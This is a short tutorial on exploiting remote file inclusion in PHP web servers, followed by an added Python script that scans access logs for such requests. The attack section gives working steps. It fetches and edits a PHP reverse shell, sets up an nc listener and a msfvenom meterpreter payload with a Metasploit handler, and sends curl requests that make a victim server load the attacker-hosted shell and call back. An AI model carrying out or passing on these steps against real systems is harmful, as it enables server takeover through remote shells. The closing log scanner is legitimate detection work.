Remote file inclusion
- Basically, this means getting the victim server to load (include) a file that is hosted online.
Cracking a PHP Linux server RFI
curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php > shell.php
Edit it with your favourite text editor; we need to change the connection settings.
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
....
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.101'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...
Host it online, and don't let the hosting server pass it to php-fpm.
Go back to your Kali Linux machine and start listening on port 4444:
root@kali:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
...
Now you can try to load the file on your victim, something like this:
curl http://192.168.56.104/page=http://192.168.56.101/shell.php
Cracking a PHP Windows server RFI
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 > shell.php
Host it online, and don't let the hosting server pass it to php-fpm.
Go back to your Kali Linux machine, enter msfconsole and use exploit/multi/handler.
msfconsole
use exploit/multi/handler
set LHOST 192.168.56.101
set LPORT 4444
set payload php/meterpreter/reverse_tcp
exploit
Now you can try to load the file on your victim, something like this:
curl http://192.168.56.104/page=http://192.168.56.101/shell.php
Back in your Kali msfconsole, there should be a shell connected.
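On the defending side, the requests shown above leave a recognisable trace in the web server's access log: a request parameter whose value is a remote URL. The following is an added example, not part of the original page, that flags such requests for review. The log lines are constructed samples in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# A parameter value that begins with a remote URL scheme.
REMOTE = re.compile(r"^\s*(https?|ftps?)\s*:", re.I)
# Request part of a combined-format access log line: "METHOD target HTTP/x"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# name=value pairs anywhere in the target; this also catches the
# "/page=http://..." form used above, which has no "?" separator.
PAIR = re.compile(r"(?:^|[/?&;])([A-Za-z0-9_\[\]]+)=([^&;\s]*)")

def fully_decode(value, rounds=3):
    """Percent-decode until stable so encoded values are compared in plain form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_candidates(line):
    """Return [(param, decoded_value)] for parameters that point at a remote URL."""
    m = REQUEST.search(line)
    if not m:
        return []
    hits = []
    for name, raw in PAIR.findall(m.group(1)):
        value = fully_decode(raw)
        if REMOTE.match(value):
            hits.append((name, value))
    return hits

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.168.56.101 - - [01/Jan/2024:10:00:00 +0000] "GET /page=http://192.168.56.101/shell.php HTTP/1.1" 200 512',
    '192.168.56.101 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=http%3A%2F%2F192.168.56.101%2Fshell.php HTTP/1.1" 200 512',
    '192.168.56.50 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
    '192.168.56.50 - - [01/Jan/2024:10:02:00 +0000] "GET /search?q=what+is+http HTTP/1.1" 200 1024',
]

def scan(lines):
    """Return [(line_index, (param, value))] for every flagged parameter."""
    return [(i, hit) for i, line in enumerate(lines) for hit in rfi_candidates(line)]

if __name__ == "__main__":
    for idx, (param, value) in scan(SAMPLE_LOG):
        print(f"line {idx}: {param} -> {value}")
```

Hits are candidates for review rather than confirmed inclusions, since legitimate parameters such as redirect targets can also carry URLs.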